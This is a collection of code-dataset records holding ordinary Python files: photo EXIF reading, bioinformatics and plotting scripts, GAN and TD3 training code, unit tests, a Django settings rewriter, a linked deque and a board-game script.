+{"seq_id":"519576173","text":"\"\"\"Get/set EXIF dates from photos\"\"\"\n\nimport exifread\nfrom icloudpd.logger import setup_logger\nimport datetime\n\n\ndef get_photo_exif(path):\n \"\"\"Get EXIF date for a photo, returning None on error\"\"\"\n try:\n with open(path, 'rb') as file:\n exif_dict = exifread.process_file(file, details=False, stop_tag='DateTimeOriginal')\n exif_date_tag = exif_dict.get('EXIF DateTimeOriginal')\n if exif_date_tag:\n return str(exif_date_tag)\n else:\n return None\n except Exception as e:\n logger = setup_logger()\n logger.debug(\"%s fetching EXIF data for %s\", e.__class__.__name__, path)\n return None\n\n\ndef exif_to_unix_local(exif_date):\n # strptime returns in local timezone\n return datetime.datetime.strptime(exif_date, \"%Y:%m:%d %H:%M:%S\").timestamp()\n","sub_path":"icloudpd/exif_datetime.py","file_name":"exif_datetime.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"653415031","text":"#!/usr/bin/env python2\nimport logging\nlogger = logging.getLogger()\nfrom collections import defaultdict\nimport argparse\nimport sys\nimport os\nfrom Bio import SeqIO\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"Given a list of FASTA files with novel alleles found with MentaLiST, output a FASTA with a unique list of novel alleles.\")\n # parser.add_argument(\"-s\", nargs=\"+\", help=\"New scheme fasta files, to compare if the novel alleles are present.\")\n parser.add_argument(\"-f\", nargs=\"+\", help=\"Fasta files with novel alleles.\")\n parser.add_argument(\"-o\", type=str, help=\"Output Fasta file with alleles above the threshold requirement(s).\")\n parser.add_argument(\"-t\", \"--threshold\", type=int, default=5, help=\"Minimum number of different samples to appear, to include a novel allele in the output fasta.\")\n parser.add_argument(\"-m\", \"--mutation\", type=int, default=0, help=\"Also include if novel allele has equal or less than this number of mutations, regardless of times seen. 
Disabled by default.\")\n parser.add_argument('-ll', '--loglevel', type=str, default=\"INFO\", choices=['DEBUG','INFO','WARNING','ERROR','CRITICAL'], help='Set the logging level')\n param = parser.parse_args()\n logging.basicConfig(level=param.loglevel, format='%(asctime)s (%(relativeCreated)d ms) -> %(levelname)s:%(message)s', datefmt='%I:%M:%S %p')\n\n logger.info(\"Reading the new alleles ...\")\n # novel = defaultdict(lambda : defaultdict(int))\n novel = defaultdict(lambda : defaultdict(list))\n loci = set()\n for f in param.f:\n # get mutations:\n with open(f[:-2] + \"txt\") as mutfile:\n mutations = {locus:nmut for locus, ab, nmut, desc in [l.strip().split(\"\\t\") for l in mutfile]}\n logger.debug(\"Opening file %s ...\" % f)\n for seq_record in SeqIO.parse(f, \"fasta\"):\n locus = seq_record.id\n dna = str(seq_record.seq)\n loci.add(locus)\n novel[locus][dna].append(int(mutations[locus]))\n\n logger.info(\"Writing output ...\")\n output_fasta = []\n print(\"Locus\\tAlleles found\\tSamples x (mutations)\")\n for locus in sorted(loci):\n output_fasta.extend([(locus,seq) for seq, l in novel[locus].items() if (len(l) >= param.threshold or min(l) <= param.mutation)])\n print(\"%s\\t%d\\t%s\" % (locus, len(novel[locus]), \", \".join([\"%dx (%d)\" % (len(l),min(l)) for seq, l in sorted(novel[locus].items(), key=lambda x:len(x[1]), reverse=True)])))\n if param.o:\n with open(param.o, \"wb\") as f:\n for locus, seq in output_fasta:\n print >> f, (\">%s\\n%s\" % (locus, seq))\n\n logger.info(\"Done.\")\n","sub_path":"scripts/parse_novel_alleles.py","file_name":"parse_novel_alleles.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"409027083","text":"s = input()\ndiff = 0\nfor i in range(len(s)):\n if i % 2 == 0:\n if s[i] == \"R\" or s[i] == \"U\" or s[i] == \"D\":\n continue\n else:\n diff += 1\n if i % 2 == 1:\n if s[i] == \"L\" or s[i] == \"U\" or s[i] == \"D\":\n continue\n else:\n diff += 1\nif diff == 0:\n print(\"Yes\")\nelse:\n print(\"No\")","sub_path":"Python_codes/p02910/s624628197.py","file_name":"s624628197.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"191865469","text":"from flask import abort, redirect, request\nimport json as _json\n\nfrom api import DiscordApiClient\nfrom utils.flask import my_render_template\nfrom .app import app\n\ndef login():\n if request.method == 'GET':\n if app._client:\n return redirect(\"/home\")\n else:\n login_failed = _json.loads(request.args.get('login_failed', 'false'))\n return my_render_template(\"login.html\", login_failed=login_failed)\n else:\n if app._client:\n abort(400)\n else:\n data = request.form\n try:\n app._client = DiscordApiClient(data['email'], data['password'])\n return redirect(\"/home\")\n except RuntimeError:\n return redirect(\"/login?login_failed=true\")","sub_path":"app/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"540441396","text":"# ===============================================================================\n# Copyright 2018 ross\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by 
applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ===============================================================================\nfrom chaco.plot_containers import HPlotContainer\nfrom enable.component_editor import ComponentEditor\nfrom traits.api import HasTraits, Instance\nfrom traitsui.api import View, UItem\n\nfrom pychron.graph.stacked_graph import StackedGraph\nfrom pychron.graph.stacked_regression_graph import StackedRegressionGraph\n\n\nclass RegressionView(HasTraits):\n name = 'Regressions'\n container = Instance(HPlotContainer)\n\n def initialize(self, an):\n an.load_raw_data()\n self.setup_graph(an)\n\n def setup_graph(self, an):\n\n container = HPlotContainer()\n\n container_dict = {'spacing': 5, 'stack_order': 'top_to_bottom'}\n sg = StackedGraph(container_dict=container_dict)\n sg.plotcontainer.spacing = 5\n sg.plotcontainer.stack_order = 'top_to_bottom'\n\n isos = an.sorted_values(reverse=False)\n add_sniff = True\n\n sisos = [iso for iso in isos if iso.sniff.offset_xs.shape[0]]\n for i, iso in enumerate(sisos):\n sniff = iso.sniff\n sg.new_plot(ytitle=iso.name, xtitle='Time (s)', title='Equilibration')\n sg.new_series(sniff.offset_xs, sniff.ys, marker='circle', type='scatter')\n sg.set_y_limits(pad='0.1', plotid=i)\n sg.set_x_limits(min_=0, max_=max(sniff.offset_xs) * 1.05, plotid=i)\n\n bg = StackedRegressionGraph(container_dict=container_dict)\n add_baseline = True\n\n ig = StackedRegressionGraph(container_dict=container_dict)\n\n iisos = [iso for iso in isos if iso.offset_xs.shape[0]]\n baselines = []\n for i, iso in enumerate(iisos):\n if iso.baseline.offset_xs.shape[0]:\n baselines.append(iso.baseline)\n ig.new_plot(ytitle='{}({})'.format(iso.name, iso.detector), xtitle='Time (s)', title='Isotope')\n ig.new_series(iso.offset_xs, iso.ys,\n display_filter_bounds=True,\n filter_outliers_dict=iso.filter_outliers_dict,\n color='blue', type='scatter', fit=iso.efit)\n ig.set_regressor(iso.regressor, i)\n ig.set_y_limits(pad='0.1', plotid=i)\n ig.set_x_limits(min_=0, max_=max(iso.offset_xs) * 1.05, plotid=i)\n\n ig.refresh()\n\n # bisos = [iso for iso in isos if iso.baseline.offset_xs.shape[0]]\n # plotted_baselines = []\n # for i, iso in enumerate(bisos):\n # baseline = iso.baseline\n # if baseline.detector in plotted_baselines:\n # continue\n # plotted_baselines.append(baseline.detector)\n\n # for iso in bisos:\n for i, baseline in enumerate(baselines):\n\n bg.new_plot(ytitle=baseline.detector, xtitle='Time (s)', title='Baseline')\n bg.new_series(baseline.offset_xs, baseline.ys,\n filter_outliers_dict=baseline.filter_outliers_dict,\n display_filter_bounds=True,\n color='red', type='scatter', fit=baseline.efit)\n bg.set_regressor(baseline.regressor, i)\n bg.set_y_limits(pad='0.1', plotid=i)\n bg.set_x_limits(pad='0.025', plotid=i)\n\n bg.refresh()\n\n container.add(sg.plotcontainer)\n container.add(ig.plotcontainer)\n container.add(bg.plotcontainer)\n\n self.container = container\n\n def traits_view(self):\n v = View(UItem('container', style='custom', editor=ComponentEditor()),\n resizable=True)\n return v\n\n# ============= EOF 
=============================================\n","sub_path":"pychron/processing/analyses/view/regression_view.py","file_name":"regression_view.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"383668291","text":"# encoding= \"utf-8\"\nimport torch\nfrom feature_selection.tools import set_requires_grad, testing\nimport torch.optim as optim\nfrom tqdm import tqdm\nimport numpy as np\nimport torch.nn as nn\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use(\"TKagg\")\n\n\ndef train_disc(disc, true, fake, optimizer, threshold, device, gan_loss, labels=None):\n set_requires_grad(disc, True)\n\n optimizer.zero_grad()\n\n if labels is not None:\n decision_fake = disc(torch.cat([fake, labels], dim=1))\n decision_true = disc(torch.cat([true, labels], dim=1))\n else:\n decision_fake = disc(fake)\n decision_true = disc(true)\n\n zeroes = torch.zeros(decision_fake.shape[0], 1).float().to(device)\n disc_fake_loss = 0.5 * gan_loss(decision_fake, zeroes)\n\n ones = torch.ones(decision_fake.shape[0], 1).float().to(device)\n disc_true_loss = 0.5 * gan_loss(decision_true, ones)\n\n disc_loss = disc_fake_loss + disc_true_loss\n\n if disc_fake_loss.mean() > threshold:\n disc_loss.backward()\n optimizer.step()\n\n return decision_fake.mean().item(), decision_true.mean().item()\n\n\ndef train_gen(gen, disc, input, optimizer, disc_conditional, gan_loss, device, data=None, **kwargs):\n gen.train()\n set_requires_grad(gen, True)\n set_requires_grad(disc, False)\n optimizer.zero_grad()\n\n generation = gen.forward(input)\n\n input = kwargs.get(\"channelwise_input\", input)\n\n if disc_conditional:\n fake_decision = disc.forward(torch.cat([generation, input], dim=1))\n else:\n fake_decision = disc.forward(generation)\n\n true_label = torch.ones(fake_decision.shape[0], 1).float().to(device)\n\n gan_loss = gan_loss(fake_decision, true_label)\n\n supervision_loss = 0. # default, so the value returned below is defined even when data is None\n if data is not None:\n mu_l1 = kwargs.get(\"mu_l1\")\n\n if mu_l1:\n supervision_loss = mu_l1 * torch.abs(generation - data).mean()\n gan_loss += supervision_loss\n supervision_loss = supervision_loss.item()\n\n else:\n supervision_loss = 0.\n\n gan_loss.backward()\n optimizer.step()\n\n return supervision_loss, fake_decision.mean()\n\n\ndef mask_concrete(mask, revelator):\n \"\"\"\n retrieve a mask-like tensor for the concrete autoencoder\n\n :param mask:\n :param revelator:\n :return:\n\n \"\"\"\n im_size = int(np.sqrt(revelator.in_features))\n mask = mask.sum(dim=1)[0].view(1, 1, im_size, im_size)\n return mask\n\n\ngan_loss = nn.BCELoss(reduction=\"mean\")\n\n\ndef train_gan(gen, disc, revelator, epochs, train_loader, test_sample, device,\n g_step=1, d_step=2, rev_step=1, mu_sparse=1e-4,\n mu_reconstruction=100, threshold=0.1, save_path=None, inc_rate=1e-5,\n lr_g=1e-4, lr_d=1e-5,\n base_epochs=0, t_min=0.05, t_init=10.,\n max_regul=1e-2):\n\n disc_losses = []\n gen_losses = []\n reveal_losses = []\n true_zeros = []\n true_ones = []\n training_over = 0\n\n G_optimizer = optim.Adam(gen.parameters(), lr=lr_g, betas=(0.8, 0.9))\n D_optimizer = optim.Adam(disc.parameters(), lr=lr_d, betas=(0.8, 0.9))\n O_optimizer = optim.Adam(revelator.parameters(), lr=4e-4, betas=(0.7, 0.9))\n\n try:\n for epoch in range(epochs):\n\n revelator.temp = t_init * (t_min / t_init) ** (epoch / epochs)\n print(\"new temperature for revelator: {}\".format(revelator.temp))\n\n if (epoch + 1) % 30 == 0:\n lr_g = lr_g / 1.1\n lr_d = lr_d / 1.1\n G_optimizer = optim.Adam(\n 
gen.parameters(), lr=lr_g, betas=(0.9, 0.9))\n D_optimizer = optim.Adam(\n disc.parameters(), lr=lr_d, betas=(0.9, 0.9))\n O_optimizer = optim.Adam(\n revelator.parameters(), lr=lr_d, betas=(0.8, 0.9))\n\n if (epoch + 1) % 2 == 0 and not training_over:\n mu_sparse = min(mu_sparse + inc_rate, max_regul)\n\n for bt, (data) in enumerate(tqdm(train_loader)):\n data = data.to(device)\n ##############################\n # DISCRIMINATOR TRAINING\n\n if bt % d_step == 0:\n # get fake data\n with torch.no_grad():\n if revelator.name == \"concrete_ae\" and data.shape[1] == 3:\n\n random_channel = np.random.randint(0, 3)\n corrupted_data, reveal_mask = revelator.get_mask(\n data[:, random_channel, :, :].unsqueeze(1),\n grad=False)\n\n else:\n corrupted_data, reveal_mask = revelator.get_mask(\n data, grad=False)\n\n fake_data = gen.forward(corrupted_data)\n\n # add conditional information\n if revelator.name == \"concrete_ae\":\n # need to get only one channel for concrete ae\n with torch.no_grad():\n labels = mask_concrete(reveal_mask, revelator)\n labels = labels * data\n labels = labels.detach()\n else:\n labels = corrupted_data.detach()\n\n des_fake, des_true = train_disc(disc, true=data, fake=fake_data,\n optimizer=D_optimizer, threshold=threshold,\n device=device, gan_loss=gan_loss,\n labels=labels)\n disc_losses.append(des_fake)\n\n ##########################\n # GENERATOR TRAINING\n if bt % g_step == 0:\n\n if revelator.name == \"concrete_ae\" and data.shape[1] == 3:\n random_channel = np.random.randint(0, 3)\n corrupted_data, reveal_mask = revelator.get_mask(\n data[:, random_channel, :, :].unsqueeze(1), grad=True)\n\n else:\n corrupted_data, reveal_mask = revelator.get_mask(\n data, grad=True)\n\n kwargs = {\"mu_l1\": mu_reconstruction}\n if revelator.name == \"concrete_ae\":\n labels = mask_concrete(reveal_mask, revelator)\n labels = labels * data\n kwargs[\"channelwise_input\"] = labels\n\n reconstruction_loss, _ = train_gen(gen=gen, disc=disc, input=corrupted_data,\n optimizer=G_optimizer, disc_conditional=True,\n gan_loss=gan_loss, device=device,\n data=data, **kwargs)\n G_optimizer.step()\n G_optimizer.zero_grad()\n\n O_optimizer.step()\n O_optimizer.zero_grad()\n gen_losses.append(reconstruction_loss)\n\n ##########################\n # Sampling TRAINING\n\n if bt % rev_step == 0 and revelator.name != \"param_optim\":\n sparse_loss = mu_sparse * revelator.l_0_cost()\n sparse_loss.backward()\n reveal_losses.append(sparse_loss.item())\n O_optimizer.step()\n O_optimizer.zero_grad()\n\n # RECORD THE FORM OF THE MASK\n true_zeros.append((reveal_mask == 0).float().mean().item())\n true_ones.append((reveal_mask == 1).float().mean().item())\n\n else:\n # keep both lists aligned when the revelator step is skipped\n true_zeros.append(1)\n true_ones.append(0)\n\n print(\"epoch {}, \\n disc_loss: {}, gen_reconstruction_loss: {} \\n\"\n \"number of true zeros: {} number of true ones: {}, mu_sparse: {} \"\n \"reveal_loss: {}\".format(epoch, np.mean(disc_losses[-10:]), np.mean(gen_losses[-10:]),\n np.mean(true_zeros[-5:]), np.mean(true_ones[-5:]), mu_sparse,\n np.mean(reveal_losses[-5:])))\n\n # SAVE MASK UNDER CONSTANT z\n _, mask_cst = revelator.get_mask(data, grad=False, fixed=True)\n fig = plt.figure(figsize=(6, 6))\n ax = plt.subplot(111)\n ax.imshow(mask_cst[0, 0].detach().cpu(), cmap=plt.cm.gray)\n ax.axis(\"off\")\n try:\n fig.savefig(save_path + \"mask_{}.pdf\".format(epoch))\n plt.close(fig)\n except:\n print(\"unable to save mask\")\n\n if (epoch + 1) % 3 == 0 and save_path is not None:\n testing(gen=gen, revelator=revelator,\n test_sample=test_sample,\n 
device=device, save_path=save_path + \"epoch_{}.png\".format(epoch + base_epochs))\n\n except KeyboardInterrupt:\n return gen_losses\n\n return gen_losses\n","sub_path":"feature_selection/train_tools_gan.py","file_name":"train_tools_gan.py","file_ext":"py","file_size_in_byte":9092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"212478197","text":"def ii():return int(input())\ndef iim():return map(int,input().split())\ndef iil():return list(map(int,input().split()))\nimport numba\nimport time\n\nstart_time = time.perf_counter()\n\n\n@numba.njit\ndef sieve_of_erastosthenes(num):\n input_list = [False if i % 2 == 0 or i % 3 == 0 or i % 5 == 0 else True for i in range(num)]\n input_list[0] = input_list[1] = False\n input_list[2] = input_list[3] = input_list[5] = True\n sqrt = num**0.5\n\n for serial in range(3, num, 2):\n if serial >= sqrt:\n prime_list = [i for i, b in enumerate(input_list) if b == True]\n return prime_list\n\n for s in range(serial ** 2, num, serial):\n input_list[s] = False\n\n@numba.njit\ndef solve(n):\n ans = 1\n l = sieve_of_erastosthenes(n+1)\n for i in range(2,n+1):\n num = i\n fac = 1\n for j in l:\n cnt = 1\n while num%j==0:\n num //= j\n cnt +=1\n fac *= cnt\n if num == 1:\n break\n ans += i*fac\n return ans\n\nn = ii()\nprint(solve(n))\nprint(\"perf_counter = {:.7f}\".format(time.perf_counter() - start_time))\n","sub_path":"ABC/ABC172/d_rev.py","file_name":"d_rev.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"25359973","text":"\"\"\"\nCodec tests.\n\n\"\"\"\nfrom json import dumps, loads\nfrom operator import itemgetter\n\nfrom hamcrest import (\n assert_that,\n calling,\n equal_to,\n instance_of,\n is_,\n raises,\n)\nfrom marshmallow import ValidationError\nfrom microcosm.api import create_object_graph\n\nfrom microcosm_pubsub.tests.fixtures import FooSchema\n\n\ndef test_no_default_schema():\n \"\"\"\n An unknown message type will fail.\n\n \"\"\"\n graph = create_object_graph(\"example\", testing=True)\n assert_that(\n calling(itemgetter(\"bar\")).with_args(graph.pubsub_message_schema_registry),\n raises(KeyError),\n )\n\n\ndef test_custom_schema():\n \"\"\"\n A configured message type will use its schema.\n\n \"\"\"\n graph = create_object_graph(\"example\", testing=True)\n codec = graph.pubsub_message_schema_registry[FooSchema.MEDIA_TYPE]\n assert_that(codec.schema, is_(instance_of(FooSchema)))\n\n\ndef test_encode():\n \"\"\"\n A message will be encoded according to its schema.\n\n \"\"\"\n graph = create_object_graph(\"example\", testing=True)\n codec = graph.pubsub_message_schema_registry[FooSchema.MEDIA_TYPE]\n assert_that(loads(codec.encode(bar=\"baz\")), is_(equal_to({\n \"bar\": \"baz\",\n \"mediaType\": \"application/vnd.globality.pubsub.foo\",\n })))\n\n\ndef test_encode_missing_field():\n \"\"\"\n An invalid message will raise errors.\n\n \"\"\"\n graph = create_object_graph(\"example\", testing=True)\n codec = graph.pubsub_message_schema_registry[FooSchema.MEDIA_TYPE]\n assert_that(calling(codec.encode).with_args(baz=\"bar\"), raises(ValidationError))\n\n\ndef test_decode():\n \"\"\"\n A message will be decoded according to its schema.\n\n \"\"\"\n graph = create_object_graph(\"example\", testing=True)\n codec = graph.pubsub_message_schema_registry[FooSchema.MEDIA_TYPE]\n message = dumps({\n \"bar\": \"baz\",\n \"mediaType\": \"application/vnd.globality.pubsub.foo\",\n })\n 
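# Note: decoding is expected to map the camelCase wire field mediaType onto the\n # snake_case key media_type, which is what the assertion below checks.\n 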
assert_that(codec.decode(message), is_(equal_to({\n \"bar\": \"baz\",\n \"media_type\": \"application/vnd.globality.pubsub.foo\",\n })))\n\n\ndef test_decode_missing_media_type():\n \"\"\"\n An invalid message will raise errors.\n\n \"\"\"\n def loader(metadata):\n return dict(\n pubsub_message_codecs=dict(\n default=FooSchema,\n ),\n )\n\n graph = create_object_graph(\"example\", testing=True, loader=loader)\n codec = graph.pubsub_message_schema_registry[FooSchema.MEDIA_TYPE]\n message = dumps({\n \"bar\": \"baz\",\n })\n assert_that(calling(codec.decode).with_args(message), raises(ValidationError))\n\n\ndef test_decode_missing_field():\n \"\"\"\n An invalid message will raise errors.\n\n \"\"\"\n graph = create_object_graph(\"example\", testing=True)\n codec = graph.pubsub_message_schema_registry[FooSchema.MEDIA_TYPE]\n message = dumps({\n \"mediaType\": \"application/vnd.globality.pubsub.foo\",\n })\n assert_that(calling(codec.decode).with_args(message), raises(ValidationError))\n","sub_path":"microcosm_pubsub/tests/test_codecs.py","file_name":"test_codecs.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"631251224","text":"# -*- coding: utf-8 -*-\n\"\"\"Run module for TD3 on LunarLanderContinuous-v2.\n\n- Author: Curt Park\n- Contact: curt.park@medipixel.io\n\"\"\"\n\nimport argparse\n\nimport gym\nimport torch\nimport torch.optim as optim\n\nfrom algorithms.common.networks.mlp import MLP\nfrom algorithms.common.noise import GaussianNoise\nfrom algorithms.td3.agent import Agent\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n# hyper parameters\nhyper_params = {\n \"GAMMA\": 0.99,\n \"TAU\": 5e-3,\n \"TARGET_SMOOTHING_NOISE_STD\": 0.2,\n \"TARGET_SMOOTHING_NOISE_CLIP\": 0.5,\n \"DELAYED_UPDATE\": 2,\n \"BUFFER_SIZE\": int(1e6),\n \"BATCH_SIZE\": 100,\n \"LR_ACTOR\": 1e-3,\n \"LR_CRITIC_1\": 1e-3,\n \"LR_CRITIC_2\": 1e-3,\n \"GAUSSIAN_NOISE_MIN_SIGMA\": 0.1,\n \"GAUSSIAN_NOISE_MAX_SIGMA\": 0.1,\n \"GAUSSIAN_NOISE_DECAY_PERIOD\": 1000000,\n \"WEIGHT_DECAY\": 1e-6,\n \"EPOCH\": 50,\n \"INITIAL_RANDOM_ACTION\": int(1e4),\n}\n\n\ndef run(env: gym.Env, args: argparse.Namespace, state_dim: int, action_dim: int):\n \"\"\"Run training or test.\n\n Args:\n env (gym.Env): openAI Gym environment with continuous action space\n args (argparse.Namespace): arguments including training settings\n state_dim (int): dimension of states\n action_dim (int): dimension of actions\n\n \"\"\"\n hidden_sizes_actor = [400, 300]\n hidden_sizes_critic = [400, 300]\n\n # create actor\n actor = MLP(\n input_size=state_dim,\n output_size=action_dim,\n hidden_sizes=hidden_sizes_actor,\n output_activation=torch.tanh,\n ).to(device)\n actor_target = MLP(\n input_size=state_dim,\n output_size=action_dim,\n hidden_sizes=hidden_sizes_actor,\n output_activation=torch.tanh,\n ).to(device)\n actor_target.load_state_dict(actor.state_dict())\n\n # create critic\n critic_1 = MLP(\n input_size=state_dim + action_dim,\n output_size=1,\n hidden_sizes=hidden_sizes_critic,\n ).to(device)\n critic_2 = MLP(\n input_size=state_dim + action_dim,\n output_size=1,\n hidden_sizes=hidden_sizes_critic,\n ).to(device)\n critic_target1 = MLP(\n input_size=state_dim + action_dim,\n output_size=1,\n hidden_sizes=hidden_sizes_critic,\n ).to(device)\n critic_target2 = MLP(\n input_size=state_dim + action_dim,\n output_size=1,\n hidden_sizes=hidden_sizes_critic,\n ).to(device)\n 
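# The target critics begin as exact copies of the online critics (the\n # load_state_dict calls below); during training the agent is then expected to\n # soft-update them toward the online networks with rate TAU from hyper_params.\n 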
critic_target1.load_state_dict(critic_1.state_dict())\n critic_target2.load_state_dict(critic_2.state_dict())\n\n # create optimizers\n actor_optim = optim.Adam(\n actor.parameters(),\n lr=hyper_params[\"LR_ACTOR\"],\n weight_decay=hyper_params[\"WEIGHT_DECAY\"],\n )\n critic_parameter = list(critic_1.parameters()) + list(critic_2.parameters())\n critic_optim = optim.Adam(\n critic_parameter,\n lr=hyper_params[\"LR_CRITIC_1\"],\n weight_decay=hyper_params[\"WEIGHT_DECAY\"],\n )\n\n # noise instance to make randomness of action\n noise = GaussianNoise(\n hyper_params[\"GAUSSIAN_NOISE_MIN_SIGMA\"],\n hyper_params[\"GAUSSIAN_NOISE_MAX_SIGMA\"],\n hyper_params[\"GAUSSIAN_NOISE_DECAY_PERIOD\"],\n )\n\n # make tuples to create an agent\n models = (actor, actor_target, critic_1, critic_2, critic_target1, critic_target2)\n optims = (actor_optim, critic_optim)\n\n # create an agent\n agent = Agent(env, args, hyper_params, models, optims, noise)\n\n # run\n if args.test:\n agent.test()\n else:\n agent.train()\n","sub_path":"examples/reacher-v2/td3.py","file_name":"td3.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"49829106","text":"import sys\r\nsys.path.append(r'../..')\r\n\r\nfrom marketsim._pub import strategy, order, constant\r\n\r\nfrom common import expose\r\n\r\n@expose(\"Noise\", __name__)\r\ndef Noise(ctx):\r\n \r\n ctx.volumeStep = 10\r\n\r\n return [\r\n ctx.makeTrader_A(\r\n strategy.LiquidityProvider(\r\n orderFactory = order.side_price.WithExpiry(\r\n constant(10),\r\n order.side_price.Limit(\r\n volume=constant(2)))),\r\n \"liquidity\"),\r\n \r\n ctx.makeTrader_A(strategy.Noise(), \"noise_ex\"),\r\n ]\r\n","sub_path":"marketsim/samples/try_noise.py","file_name":"try_noise.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"222220709","text":"from django.test import TestCase\nfrom datetime import datetime, date\nfrom models import Trip\n\n# Create your tests here.\nclass TripTestCase(TestCase):\n def setUp(self):\n Trip.objects.create(name=\"London\", \n start_date=date(2017, 5, 24), \n finish_date=date(2017, 9, 24))\n Trip.objects.create(name=\"Moscow\", \n start_date=date(2017, 5, 24), \n finish_date=date(2017, 6, 24))\n \n def test_getTripName(self):\n trip = Trip.objects.get(name=\"London\")\n self.assertEqual(trip.getTripName(), \"London\")\n \n def test_getTriStartDate(self):\n trip = Trip.objects.get(name=\"London\")\n self.assertEqual(trip.getTripStartDate(), date(2017, 5, 24))\n \n def test_getTripFinishDate(self):\n trip = Trip.objects.get(name=\"London\")\n self.assertEqual(trip.getTripFinishDate(), date(2017, 9, 24))","sub_path":"trips/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"557487898","text":"#! 
python3\n\nimport sys\nfrom pathlib import Path\nimport re\n\ndefault_db_block = '''DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}'''\n\nreplacement_db_block = '''DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': os.environ.get('POSTGRES_DATABASE'),\n 'USER': os.environ.get('POSTGRES_USER'),\n 'PASSWORD': os.environ.get('POSTGRES_PASSWORD'),\n 'HOST': os.environ.get('POSTGRES_DOCKER_HOST'),\n 'PORT': os.environ.get('POSTGRES_PORT'),\n }\n}'''\n\nsubst_starts_with = [\n 'SECRET_KEY',\n 'DEBUG',\n 'ALLOWED_HOSTS'\n]\n\n\ndef substitute_text(text):\n text = text.replace(default_db_block, replacement_db_block)\n # NB: the pattern consumes the trailing newline, so each replacement must put it back\n for key in subst_starts_with:\n temp = re.subn(r'{}.*\\n'.format(key),\n f\"{key} = os.environ['{key}']\\n\", text)[0]\n if key == 'ALLOWED_HOSTS':\n temp = re.subn(\n r'{}.*\\n'.format(key),\n f\"{key} = os.environ['{key}'].split(',')\\n\", text)[0]\n text = temp\n text += \"MEDIA_ROOT = os.path.join(BASE_DIR, 'media')\\n\"\n text += \"MEDIA_URL = '/media/'\\n\"\n text += \"STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')\\n\"\n return text\n\n\nif __name__ == '__main__':\n path = Path(sys.argv[1])\n in_text = path.read_text()\n rep_text = substitute_text(in_text)\n path.write_text(rep_text)\n print(f'replacements saved in file {path}')\n","sub_path":"replace/replace.py","file_name":"replace.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"12493182","text":"from DoublyLinkedBase import _DoublyLinkedBase\n\n\nclass Empty(Exception):\n pass\n\nclass LinkedDeque(_DoublyLinkedBase):\n \"\"\"Double-ended queue implementation based on a doubly linked list.\n \"\"\"\n def first(self):\n if self.is_empty():\n raise Empty(\"Deque is empty\")\n return self._header._next._element\n \n def last(self):\n if self.is_empty():\n raise Empty(\"Deque is empty\")\n return self._tailer._prev._element\n\n def insert_first(self, e):\n return self._insert_between(e, self._header, self._header._next)\n\n def insert_last(self, e):\n return self._insert_between(e, self._tailer._prev, self._tailer)\n \n def delete_first(self):\n if self.is_empty():\n raise Empty(\"Deque is empty\")\n return self._delete_node(self._header._next)\n\n def delete_last(self):\n if self.is_empty():\n raise Empty(\"Deque is empty\")\n return self._delete_node(self._tailer._prev)\n\n\nif __name__ == '__main__':\n ld = LinkedDeque()\n ld.insert_first(1)\n ld.insert_last(2)\n ld.insert_last(3)\n print(ld)\n print(ld.first())\n print(ld.last())\n ld.delete_first()\n print(ld)\n","sub_path":"src/data-structures/doubly-linked-list/LinkedDeque.py","file_name":"LinkedDeque.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"472012800","text":"import cv2\nfrom DSBoard import Board\n\n\ndef display_moves():\n moves = board.get_possible_moves()\n\n for p in moves:\n print(\"----------------\")\n for m in p:\n print(m)\n\n\nboard = Board()\n\n\ncount = 0\nfor i in range(15):\n moves = board.get_possible_moves(randomize=True)\n print(\"**\")\n for p in moves:\n print(p)\n print(\"*\")\n m = moves[i%2][0]\n board.make_move_for_player(m, i%2)\n board.show_board()\n print(board)\n print(\"--------------\")\n cv2.waitKey(0)\n\n# print(board)\n# board.show_board()\n# display_moves()\n#\n# board.make_move_for_player([[4,3],2],0)\n# 
